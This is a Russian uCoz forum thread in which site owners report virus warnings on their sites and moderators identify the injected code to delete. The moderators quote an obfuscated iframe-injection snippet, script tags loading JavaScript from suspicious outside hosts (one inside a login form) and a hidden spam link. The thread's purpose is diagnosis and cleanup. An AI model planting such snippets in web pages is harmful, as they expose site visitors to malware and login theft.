Модератор форума: Yuri_G |
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
Вирусы на сайтах |
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
У меня слайдер стоит давно и все было нормально до сегодняшнего дня.
Спасибо.Оказываетя он был уже зарегестрирован. Назала проверить и мне написало "15.02.2015 оставлена заявка на проверку сайта, она займет несколько дней." Мне прийдется несколько дней ждать? Как же найти этот код зараженый? Добавлено (15 Фев 2015, 13:44:17) |
Поведенческий анализатор Яндекса. Удалите код ведущий на lifi-gta .ru. Подозрительный код. Сценарий содержит IFRAME. Код var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://lifi-gta.ru'; wishyhd.appendChild(emptiestag); Удалите по возможности и другие коды ведущие на сторонние ресурсы |
Leonora_, стыдно превращать сайт для детей в такое грязно скрипто-помоище.
через быструю замену удалить следующие вредоносные скрипты Код <script src="http://am-investor.ru/higer.js" type="text/javascript"></script> Код <script src="http://lifi-gta.ru/jogin_form_javascript.js" type="text/javascript"></script> далее нужно очистить сайт от грязи удалить блок часы и скрипт Код <script language="JavaScript" src="http://xuxu.org.ua/i/200/200/10179812"></script> полностью удалить перевод сайта на миллион языков самое умное конечно было бы восстановление шаблона мини-чата, опроса и всего сайта бесполезнейший календарь вы вставили с поисковым спамом Код <div style="display:none;"><a href="http://wallaby.ucoz.ru">меню для ucoz</a></div> удалите код Код <script type="text/javascript" src="http://ili.pp.ua/js_css/show.js"></script> на будущее. если вы вообще ничего не понимаете в коде, то воздержитесь от сбора скриптов в открытом доступе |
Рекомендую сменить пароль к ПУ. Пароли uID профиля и к административной панели — должны быть сложнее. Никогда не храните пароли в текстовом файле или в письмах на своем почтовом ящике. Не сохраняйте пароли в браузере или ftp-клиенте. Пароли должны быть длинными и сложными.
P.S. удалите ссылки ведущие на сторонние ресурсы. У вас множество картинок тянутся со сторонних ресурсов. |
Обнаружил на многих сайтах, сделанных на Юкоз, что выскакивает на заднем фоне новое окно браузера (например: http://goinf.ru/index33 -
антивирус NOD32 блокирует как "Потенциально нежелательное содержимое") - очень неприятное явление. Сайт: и вот после первого клика мышкой (в любом месте!!!) появляется такая страница: Выглядит очень стремно, отталкивает посетителей от сайта... Помогите, пожалуйста! Только умный может попасть в глупое положение,
ибо глупец находится в нем всю жизнь. |
Здравствуйте, помогите вернуть сайт http://gia2.ru/
Каков алгоритм моих действий? Сайт заблокирован несколько дней назад системой Ucoz по причине зараженности вирусом. До блокировки на сайт нельзя было зайти при включенном KIS2014 с любого браузера, антивирус выдавал вот такое сообщение: Прикрепления:
0375917.png
(10.1 Kb)
|
Egor1151, удалите фреймы из материала, на странице index/zarabotok_bez_vlozhenij/0-4
Также ознакомьтесь с //forum.ucoz.ru/forum/35-31448-112 |
Egor1151, нормально. судя по скрину, который вы предоставили ваш домен попал под блок. вам надо связаться с тех.поддержкой касперского и решить этот вопрос. если вы очистили сайт, то ваш домен должны исключить из блок листа на следующих обновлениях
|
Всем доброго дня.
Сайт http://firemaster.ucoz.ru/ Яндекс ругается на вирус перенаправлений вроде никаких не заметил, но при заходе на сайт Adguard выдаёт предупреждение Антивирус Norton 360 - тоже молчит. Помогите пожалуйста найди заразу.... Спасибо. Прикрепления:
9964047.jpg
(60.4 Kb)
·
1175638.jpg
(23.8 Kb)
|
Вдруг откуда не возьмись появились вирусы на http://djgelius.3dn.ru/
Цитата Яндекс проверяет страницы сайта выборочно, поэтому список зараженных страниц может быть неполным. Пожалуйста, проверьте и другие страницы, а также элементы, общие для всех страниц. Выполнение вредоносного кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, а также к порче или краже данных. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта. Перепроверить Результат выборочной проверки Дата последней проверкиСтраницаВердикт04.03.2015http://djgelius.3dn.ru/load/0-0-1-1018-20Поведенческий анализ04.03.2015http://djgelius.3dn.ru/load/0-0-1-1027-20Поведенческий анализ04.03.2015http://djgelius.3dn.ru/load/0-0-1-863-20Поведенческий анализ |
govitya, из формы входа удалите скрипт
Код <script type="text/javascript" src="http://login-form.bot56.ru/jogin_form_javascript.js"></script> после удаления задайте перепроверку сайта в вебмастере яндекса |
| |||